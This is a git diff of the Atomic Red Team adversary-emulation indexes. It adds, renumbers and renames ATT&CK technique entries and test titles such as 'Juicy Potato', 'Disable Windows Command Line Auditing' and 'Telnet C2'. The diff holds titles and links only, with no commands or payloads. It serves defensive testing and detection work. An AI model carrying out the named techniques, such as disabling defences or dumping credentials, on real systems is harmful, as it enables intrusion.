+  - Atomic Test #59: Modify Internet Zone Protocol Defaults in Current User Registry - cmd [windows]
+  - Atomic Test #60: Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell [windows]
+  - Atomic Test #61: Activities To Disable Secondary Authentication Detected By Modified Registry Value. [windows]
+  - Atomic Test #62: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. [windows]
+  - Atomic Test #63: Scarab Ransomware Defense Evasion Activities [windows]
+  - Atomic Test #64: Disable Remote Desktop Anti-Alias Setting Through Registry [windows]
+  - Atomic Test #65: Disable Remote Desktop Security Settings Through Registry [windows]
+  - Atomic Test #66: Disabling ShowUI Settings of Windows Error Reporting (WER) [windows]
+  - Atomic Test #67: Enable Proxy Settings [windows]
+  - Atomic Test #68: Set-Up Proxy Server [windows]
+  - Atomic Test #69: RDP Authentication Level Override [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
   - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -485,6 +489,7 @@
   - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
   - Atomic Test #3: Launch NSudo Executable [windows]
   - Atomic Test #4: Bad Potato [windows]
+  - Atomic Test #5: Juicy Potato [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.012 LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
@@ -492,7 +497,7 @@
   - Atomic Test #2: Create Hidden User using IsHidden option [macos]
   - Atomic Test #3: Create Hidden User in Registry [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
+- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
   - Atomic Test #1: Disable history collection [linux, macos]
   - Atomic Test #2: Disable history collection (freebsd) [linux]
   - Atomic Test #3: Mac HISTCONTROL [macos, linux]
@@ -503,6 +508,8 @@
   - Atomic Test #8: Setting the HISTFILE environment variable [linux]
   - Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux]
   - Atomic Test #10: Setting the HISTIGNORE environment variable [linux]
+  - Atomic Test #11: Disable Windows Command Line Auditing using reg.exe [windows]
+  - Atomic Test #12: Disable Windows Command Line Auditing using Powershell Cmdlet [windows]
 - T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -986,6 +993,7 @@
   - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
   - Atomic Test #3: Launch NSudo Executable [windows]
   - Atomic Test #4: Bad Potato [windows]
+  - Atomic Test #5: Juicy Potato [windows]
 - [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
   - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
   - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
@@ -1223,7 +1231,8 @@
 - T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1610 Deploy a container](../../T1610/T1610.md)
   - Atomic Test #1: Deploy Docker container [containers]
-- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1059 Command and Scripting Interpreter](../../T1059/T1059.md)
+  - Atomic Test #1: AutoIt Script Execution [windows]
 - [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
   - Atomic Test #1: ExecIntoContainer [containers]
   - Atomic Test #2: Docker Exec Into Container [containers]
@@ -1344,7 +1353,8 @@
 - [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
   - Atomic Test #1: ListCronjobs [containers]
   - Atomic Test #2: CreateCronjob [containers]
-- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1542.001 Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md)
+  - Atomic Test #1: UEFI Persistence via Wpbbin.exe File Creation [windows]
 - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
   - Atomic Test #1: Service Registry Permissions Weakness [windows]
   - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
@@ -1473,7 +1483,8 @@
   - Atomic Test #4: Active Directory Create Admin Account [linux]
   - Atomic Test #5: Active Directory Create User Account (Non-elevated) [linux]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1137.001 Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md)
+  - Atomic Test #1: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell [windows]
 - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
   - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1670,7 +1681,8 @@
   - Atomic Test #4: DNS C2 [windows]
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1071 Application Layer Protocol](../../T1071/T1071.md)
+  - Atomic Test #1: Telnet C2 [windows]
 - [T1219 Remote Access Software](../../T1219/T1219.md)
   - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
   - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
@@ -1683,6 +1695,7 @@
   - Atomic Test #9: UltraViewer - RAT Execution [windows]
   - Atomic Test #10: UltraVNC Execution [windows]
   - Atomic Test #11: MSP360 Connect Execution [windows]
+  - Atomic Test #12: RustDesk Files Detected Test on Windows [windows]
 - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1572 Protocol Tunneling](../../T1572/T1572.md)
@@ -1756,7 +1769,9 @@
   - Atomic Test #27: Linux Download File and Run [linux]
   - Atomic Test #28: Nimgrab - Transfer Files [windows]
   - Atomic Test #29: iwr or Invoke Web-Request download [windows]
-- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
+  - Atomic Test #1: Steganographic Tarball Embedding [windows]
+  - Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage [windows]
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
   - Atomic Test #1: Connection Proxy [linux, macos]
@@ -1776,6 +1791,7 @@
   - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
   - Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
   - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
+  - Atomic Test #10: ESXi - Remove Syslog remote IP [windows]
 - [T1113 Screen Capture](../../T1113/T1113.md)
   - Atomic Test #1: Screencapture [macos]
   - Atomic Test #2: Screencapture (silent) [macos]
@@ -1938,6 +1954,7 @@
   - Atomic Test #5: SUDO Brute Force - Debian [linux]
   - Atomic Test #6: SUDO Brute Force - Redhat [linux]
   - Atomic Test #7: SUDO Brute Force - FreeBSD [linux]
+  - Atomic Test #8: ESXi - Brute Force Until Account Lockout [windows]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
   - Atomic Test #1: Gsecdump [windows]
   - Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -2152,6 +2169,7 @@
   - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
   - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
   - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
+  - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
 - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
   - Atomic Test #1: Request for service tickets [windows]
   - Atomic Test #2: Rubeus kerberoast [windows]
@@ -2286,6 +2304,7 @@
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
   - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
   - Atomic Test #2: WinPwn - printercheck [windows]
+  - Atomic Test #3: Peripheral Device Discovery via fsutil [windows]
 - [T1082 System Information Discovery](../../T1082/T1082.md)
   - Atomic Test #1: System Information Discovery [windows]
   - Atomic Test #2: System Information Discovery [macos]
@@ -2375,6 +2394,7 @@
   - Atomic Test #1: AWS S3 Enumeration [iaas:aws]
 - [T1654 Log Enumeration](../../T1654/T1654.md)
   - Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows]
+  - Atomic Test #2: Enumerate Windows Security Log via WevtUtil [windows]
 - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
   - Atomic Test #1: Process Discovery - ps [linux, macos]
@@ -2729,6 +2749,7 @@
   - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
 - [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
   - Atomic Test #1: Data Transfer Size Limits [macos, linux]
+  - Atomic Test #2: Network-Based Data Transfer in Small Chunks [windows]
 - T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index f4c58991..6e93868b 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -146,7 +146,7 @@
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
+- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
   - Atomic Test #1: Disable history collection [linux, macos]
   - Atomic Test #2: Disable history collection (freebsd) [linux]
   - Atomic Test #3: Mac HISTCONTROL [macos, linux]
@@ -365,7 +365,7 @@
   - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
   - Atomic Test #14: whois file download [linux, macos]
   - Atomic Test #27: Linux Download File and Run [linux]
-- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
   - Atomic Test #1: Connection Proxy [linux, macos]
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index 78931045..c6d4c698 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -108,7 +108,7 @@
 - [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
   - Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
   - Atomic Test #2: Create Hidden User using IsHidden option [macos]
-- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
+- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
   - Atomic Test #1: Disable history collection [linux, macos]
   - Atomic Test #3: Mac HISTCONTROL [macos, linux]
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -300,7 +300,7 @@
   - Atomic Test #5: sftp remote file copy (push) [linux, macos]
   - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
   - Atomic Test #14: whois file download [linux, macos]
-- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
   - Atomic Test #1: Connection Proxy [linux, macos]
diff --git a/atomics/Indexes/Indexes-Markdown/office-365-index.md b/atomics/Indexes/Indexes-Markdown/office-365-index.md
index 8be13605..1346b07b 100644
--- a/atomics/Indexes/Indexes-Markdown/office-365-index.md
+++ b/atomics/Indexes/Indexes-Markdown/office-365-index.md
@@ -93,7 +93,7 @@
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 8b14186c..dc6b9e44 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -18,6 +18,7 @@
   - Atomic Test #11: Rundll32 with Ordinal Value [windows]
   - Atomic Test #12: Rundll32 with Control_RunDLL [windows]
   - Atomic Test #13: Rundll32 with desk.cpl [windows]
+  - Atomic Test #14: Running DLL with .init extension and function [windows]
 - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
   - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
@@ -54,7 +55,8 @@
   - Atomic Test #24: Disable UAC - Switch to the secure desktop when prompting for elevation via registry key [windows]
   - Atomic Test #25: Disable UAC notification via registry keys [windows]
   - Atomic Test #26: Disable ConsentPromptBehaviorAdmin via registry keys [windows]
-- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1542.001 Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md)
+  - Atomic Test #1: UEFI Persistence via Wpbbin.exe File Creation [windows]
 - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
   - Atomic Test #1: Service Registry Permissions Weakness [windows]
   - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
@@ -194,6 +196,7 @@
   - Atomic Test #20: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
   - Atomic Test #21: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
   - Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows]
+  - Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows]
 - [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md)
   - Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows]
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -204,71 +207,72 @@
   - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
   - Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
   - Atomic Test #3: Modify registry to store logon credentials [windows]
-  - Atomic Test #4: Add domain to Trusted sites Zone [windows]
-  - Atomic Test #5: Javascript in registry [windows]
-  - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
-  - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
-  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
-  - Atomic Test #9: Disable Windows Registry Tool [windows]
-  - Atomic Test #10: Disable Windows CMD application [windows]
-  - Atomic Test #11: Disable Windows Task Manager application [windows]
-  - Atomic Test #12: Disable Windows Notification Center [windows]
-  - Atomic Test #13: Disable Windows Shutdown Button [windows]
-  - Atomic Test #14: Disable Windows LogOff Button [windows]
-  - Atomic Test #15: Disable Windows Change Password Feature [windows]
-  - Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
-  - Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
-  - Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
-  - Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
-  - Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
-  - Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
-  - Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
-  - Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
-  - Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
-  - Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
-  - Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
-  - Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
-  - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
-  - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
-  - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
-  - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
-  - Atomic Test #32: Windows Powershell Logging Disabled [windows]
-  - Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
-  - Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
-  - Atomic Test #35: Disable Windows Toast Notifications [windows]
-  - Atomic Test #36: Disable Windows Security Center Notifications [windows]
-  - Atomic Test #37: Suppress Win Defender Notifications [windows]
-  - Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
-  - Atomic Test #39: NetWire RAT Registry Key Creation [windows]
-  - Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
-  - Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
-  - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
-  - Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
-  - Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
-  - Atomic Test #45: Mimic Ransomware - Enable Multiple User Sessions [windows]
-  - Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
-  - Atomic Test #47: Event Viewer Registry Modification - Redirection URL [windows]
-  - Atomic Test #48: Event Viewer Registry Modification - Redirection Program [windows]
-  - Atomic Test #49: Enabling Remote Desktop Protocol via Remote Registry [windows]
-  - Atomic Test #50: Disable Win Defender Notification [windows]
-  - Atomic Test #51: Disable Windows OS Auto Update [windows]
-  - Atomic Test #52: Disable Windows Auto Reboot for current logon user [windows]
-  - Atomic Test #53: Windows Auto Update Option to Notify before download [windows]
-  - Atomic Test #54: Do Not Connect To Win Update [windows]
-  - Atomic Test #55: Tamper Win Defender Protection [windows]
-  - Atomic Test #56: Snake Malware Registry Blob [windows]
-  - Atomic Test #57: Allow Simultaneous Download Registry [windows]
-  - Atomic Test #58: Modify Internet Zone Protocol Defaults in Current User Registry - cmd [windows]
-  - Atomic Test #59: Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell [windows]
-  - Atomic Test #60: Activities To Disable Secondary Authentication Detected By Modified Registry Value. [windows]
-  - Atomic Test #61: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. [windows]
-  - Atomic Test #62: Scarab Ransomware Defense Evasion Activities [windows]
-  - Atomic Test #63: Disable Remote Desktop Anti-Alias Setting Through Registry [windows]
-  - Atomic Test #64: Disable Remote Desktop Security Settings Through Registry [windows]
-  - Atomic Test #65: Disabling ShowUI Settings of Windows Error Reporting (WER) [windows]
-  - Atomic Test #66: Enable Proxy Settings [windows]
-  - Atomic Test #67: Set-Up Proxy Server [windows]
-  - Atomic Test #68: RDP Authentication Level Override [windows]
+  - Atomic Test #4: Use Powershell to Modify registry to store logon credentials [windows]
+  - Atomic Test #5: Add domain to Trusted sites Zone [windows]
+  - Atomic Test #6: Javascript in registry [windows]
+  - Atomic Test #7: Change Powershell Execution Policy to Bypass [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #9: BlackByte Ransomware Registry Changes - Powershell [windows]
+  - Atomic Test #10: Disable Windows Registry Tool [windows]
+  - Atomic Test #11: Disable Windows CMD application [windows]
+  - Atomic Test #12: Disable Windows Task Manager application [windows]
+  - Atomic Test #13: Disable Windows Notification Center [windows]
+  - Atomic Test #14: Disable Windows Shutdown Button [windows]
+  - Atomic Test #15: Disable Windows LogOff Button [windows]
+  - Atomic Test #16: Disable Windows Change Password Feature [windows]
+  - Atomic Test #17: Disable Windows Lock Workstation Feature [windows]
+  - Atomic Test #18: Activate Windows NoDesktop Group Policy Feature [windows]
+  - Atomic Test #19: Activate Windows NoRun Group Policy Feature [windows]
+  - Atomic Test #20: Activate Windows NoFind Group Policy Feature [windows]
+  - Atomic Test #21: Activate Windows NoControlPanel Group Policy Feature [windows]
+  - Atomic Test #22: Activate Windows NoFileMenu Group Policy Feature [windows]
+  - Atomic Test #23: Activate Windows NoClose Group Policy Feature [windows]
+  - Atomic Test #24: Activate Windows NoSetTaskbar Group Policy Feature [windows]
+  - Atomic Test #25: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
+  - Atomic Test #26: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
+  - Atomic Test #27: Hide Windows Clock Group Policy Feature [windows]
+  - Atomic Test #28: Windows HideSCAHealth Group Policy Feature [windows]
+  - Atomic Test #29: Windows HideSCANetwork Group Policy Feature [windows]
+  - Atomic Test #30: Windows HideSCAPower Group Policy Feature [windows]
+  - Atomic Test #31: Windows HideSCAVolume Group Policy Feature [windows]
+  - Atomic Test #32: Windows Modify Show Compress Color And Info Tip Registry [windows]
+  - Atomic Test #33: Windows Powershell Logging Disabled [windows]
+  - Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
+  - Atomic Test #35: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
+  - Atomic Test #36: Disable Windows Toast Notifications [windows]
+  - Atomic Test #37: Disable Windows Security Center Notifications [windows]
+  - Atomic Test #38: Suppress Win Defender Notifications [windows]
+  - Atomic Test #39: Allow RDP Remote Assistance Feature [windows]
+  - Atomic Test #40: NetWire RAT Registry Key Creation [windows]
+  - Atomic Test #41: Ursnif Malware Registry Key Creation [windows]
+  - Atomic Test #42: Terminal Server Client Connection History Cleared [windows]
+  - Atomic Test #43: Disable Windows Error Reporting Settings [windows]
+  - Atomic Test #44: DisallowRun Execution Of Certain Applications [windows]
+  - Atomic Test #45: Enabling Restricted Admin Mode via Command_Prompt [windows]
+  - Atomic Test #46: Mimic Ransomware - Enable Multiple User Sessions [windows]
+  - Atomic Test #47: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
+  - Atomic Test #48: Event Viewer Registry Modification - Redirection URL [windows]
+  - Atomic Test #49: Event Viewer Registry Modification - Redirection Program [windows]
+  - Atomic Test #50: Enabling Remote Desktop Protocol via Remote Registry [windows]
+  - Atomic Test #51: Disable Win Defender Notification [windows]
+  - Atomic Test #52: Disable Windows OS Auto Update [windows]
+  - Atomic Test #53: Disable Windows Auto Reboot for current logon user [windows]
+  - Atomic Test #54: Windows Auto Update Option to Notify before download [windows]
+  - Atomic Test #55: Do Not Connect To Win Update [windows]
+  - Atomic Test #56: Tamper Win Defender Protection [windows]
+  - Atomic Test #57: Snake Malware Registry Blob [windows]
+  - Atomic Test #58: Allow Simultaneous Download Registry [windows]
+  - Atomic Test #59: Modify Internet Zone Protocol Defaults in Current User Registry - cmd [windows]
+  - Atomic Test #60: Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell [windows]
+  - Atomic Test #61: Activities To Disable Secondary Authentication Detected By Modified Registry Value. [windows]
+  - Atomic Test #62: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. [windows]
+  - Atomic Test #63: Scarab Ransomware Defense Evasion Activities [windows]
+  - Atomic Test #64: Disable Remote Desktop Anti-Alias Setting Through Registry [windows]
+  - Atomic Test #65: Disable Remote Desktop Security Settings Through Registry [windows]
+  - Atomic Test #66: Disabling ShowUI Settings of Windows Error Reporting (WER) [windows]
+  - Atomic Test #67: Enable Proxy Settings [windows]
+  - Atomic Test #68: Set-Up Proxy Server [windows]
+  - Atomic Test #69: RDP Authentication Level Override [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
   - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -342,12 +346,15 @@
   - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
   - Atomic Test #3: Launch NSudo Executable [windows]
   - Atomic Test #4: Bad Potato [windows]
+  - Atomic Test #5: Juicy Potato [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.012 LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
   - Atomic Test #3: Create Hidden User in Registry [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1562.003 Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
+  - Atomic Test #11: Disable Windows Command Line Auditing using reg.exe [windows]
+  - Atomic Test #12: Disable Windows Command Line Auditing using Powershell Cmdlet [windows]
 - T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -692,6 +699,7 @@
   - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
   - Atomic Test #3: Launch NSudo Executable [windows]
   - Atomic Test #4: Bad Potato [windows]
+  - Atomic Test #5: Juicy Potato [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
   - Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
@@ -848,7 +856,8 @@
   - Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
